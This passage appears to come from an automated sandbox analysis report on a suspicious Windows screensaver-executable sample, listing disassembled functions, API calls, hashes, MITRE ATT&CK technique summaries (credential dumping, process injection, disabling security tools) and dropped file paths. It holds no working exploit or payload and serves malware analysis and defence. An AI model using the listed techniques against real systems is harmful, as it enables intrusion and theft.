Opcode Fuzzy Hash: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
Instruction Fuzzy Hash: E241D13AA0864285EB14FF25A4400B8F794EF44B94B96443AE92F47BC5DF3CE483C3A1

Function 00007FF7F7EC7C38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,?,?,00007FF7F7EC7471), ref: 00007FF7F7EC7C96
wcsstr.LIBVCRUNTIME ref: 00007FF7F7EC7CBC

Strings

System Volume Information\, xrefs: 00007FF7F7EC7CB2

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: AttributesFilewcsstr
String ID: System Volume Information\
API String ID: 1592324571-4227249723
Opcode ID: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
Instruction ID: 25d4fb61f6635d8157e7d4867a63ab3833d2b0f0feb46fbab9ba669b315f7604
Opcode Fuzzy Hash: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
Instruction Fuzzy Hash: FF31182DA1968245FB50FB21A1506FDAB60AF49BC0F844032EE6E077D6DE3CE453C7A0

Function 00007FF7F7E94888 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON

Download Yara Rule

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F7E948F8

Part of subcall function 00007FF7F7EC49F4: LoadStringW.USER32 ref: 00007FF7F7EC4A7B
Part of subcall function 00007FF7F7EC49F4: LoadStringW.USER32 ref: 00007FF7F7EC4A94

Part of subcall function 00007FF7F7E98444: fflush.LIBCMT ref: 00007FF7F7E98477

Strings

[, xrefs: 00007FF7F7E948E5
%d.%02d, xrefs: 00007FF7F7E948DE

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: LoadString$fflushswprintf
String ID: %d.%02d$[
API String ID: 1946543793-195111373
Opcode ID: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
Instruction ID: 5ddcc31ff6d38c19849f58f061e3ba5c075c7f84e17a340dad679a927f775112
Opcode Fuzzy Hash: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
Instruction Fuzzy Hash: 3D318F2AA0958645FB50BB24E4157F9A7A0AF85748FC4103AD66F0B7C6DF3CE44AC7A0

Function 00007FF7F7EBF474 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON

Download Yara Rule

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F7EBF4D2

Strings

fixed%u., xrefs: 00007FF7F7EBF4C6
fixed., xrefs: 00007FF7F7EBF4B8

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: swprintf
String ID: fixed%u.$fixed.
API String ID: 233258989-2525383582
Opcode ID: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
Instruction ID: 05bd1a5c72e47753c1637c7dcab017f8d628de906ed98aca8b096c1992930bdf
Opcode Fuzzy Hash: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
Instruction Fuzzy Hash: 5431B96AA0868151EB10FB29E4417E9A760FB45794FD00233EA6E176DADF3CD507C7A0

Function 00007FF7F7EC3C20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON

Download Yara Rule

APIs

snprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F7EC3CB0

Strings

@%s, xrefs: 00007FF7F7EC3C94
$%s, xrefs: 00007FF7F7EC3C9D

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: snprintf
String ID: $%s$@%s
API String ID: 4288800496-834177443
Opcode ID: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
Instruction ID: 8dbcaf9730402e0194a597e77ba1a77f4bed1688e9132b50b3ad2c2db801e633
Opcode Fuzzy Hash: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
Instruction Fuzzy Hash: DF31902EB08A4296EB10AB55E440BADA364FB54788FC00037DE2E17BD5DE3DD516C7A0

Function 00007FF7F7EC49F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

LoadStringW.USER32 ref: 00007FF7F7EC4A7B
LoadStringW.USER32 ref: 00007FF7F7EC4A94

Strings

Adding %-58s , xrefs: 00007FF7F7EC4A16

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: LoadString
String ID: Adding %-58s
API String ID: 2948472770-2059140559
Opcode ID: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
Instruction ID: a7730defd3bfecc61b06e5f9da8116b6b62fde35b805e44d6821948f0cdcb669
Opcode Fuzzy Hash: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
Instruction Fuzzy Hash: A5116069B14B8185E710AF16E840568F7A1FB94FE0F948436CE2D837A4EE7CE6078394

Function 00007FF7F7E85DB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F7E85E1B
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F7E85E2F

Strings

;%%0%du, xrefs: 00007FF7F7E85E0A

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: swprintf
String ID: ;%%0%du
API String ID: 233258989-2249936285
Opcode ID: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
Instruction ID: 4eafdc222a4a610ab098927a299e1b4a57f79d792e02d3326e2468e3f41ada68
Opcode Fuzzy Hash: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
Instruction Fuzzy Hash: 1411982AB0868086E720AB24E4117E9B761FB88748FC94132DF5E477D6DE3CD946CB90

Function 00007FF7F7EA331C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F7EB42CC: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F7EB430F

GetVolumeInformationW.KERNEL32(?,00007FF7F7EA0BED,?,?,00000000,?,?,00007FF7F7E9F30F,00000000,00007FF7F7E86380,?,00007FF7F7E82EC8), ref: 00007FF7F7EA337E

Strings

FAT, xrefs: 00007FF7F7EA3388
FAT32, xrefs: 00007FF7F7EA339D

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: InformationVolumeswprintf
String ID: FAT$FAT32
API String ID: 989755765-1174603449
Opcode ID: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
Instruction ID: 84ed01e50e4043a0975dff0248d130769ea3b0917fb1ec7006f8343af6423532
Opcode Fuzzy Hash: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
Instruction Fuzzy Hash: D8118635A1CA4241F760AF10E8816E6B354FB95344FC05036E56E83AD5DF3CD54A8B50

Function 00007FF7F7ECB974 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF7F7ECB97B
GetLastError.KERNEL32 ref: 00007FF7F7ECB986

Part of subcall function 00007FF7F7E9CA40: _CxxThrowException.LIBVCRUNTIME ref: 00007FF7F7E9CEDE

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00007FF7F7ECB990

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: ErrorExceptionLastObjectSingleThrowWait
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 564652978-2248577382
Opcode ID: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
Instruction ID: 4f0f4ce070a8d805150324086c14ec86e7f1d0c7f9e2df3c5d7a4ff0394eb467
Opcode Fuzzy Hash: 46226563a9827009269dbdda457766bca55c7f33c1314a041e0b52dd23cb2e00
Instruction Fuzzy Hash: A1E01A2EE0880282E700B735AC814B4B361AF60774FD04732D03F429E2DF6CA54783A1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report #U202f#U202f#U2005#U00a0.scr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Stealing of Sensitive Information

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\??? \Display (1).png

C:\Users\user\AppData\Local\Temp\MpCmdRun.log

C:\Users\user\AppData\Local\Temp\QzNtG.zip

C:\Users\user\AppData\Local\Temp\RES6756.tmp

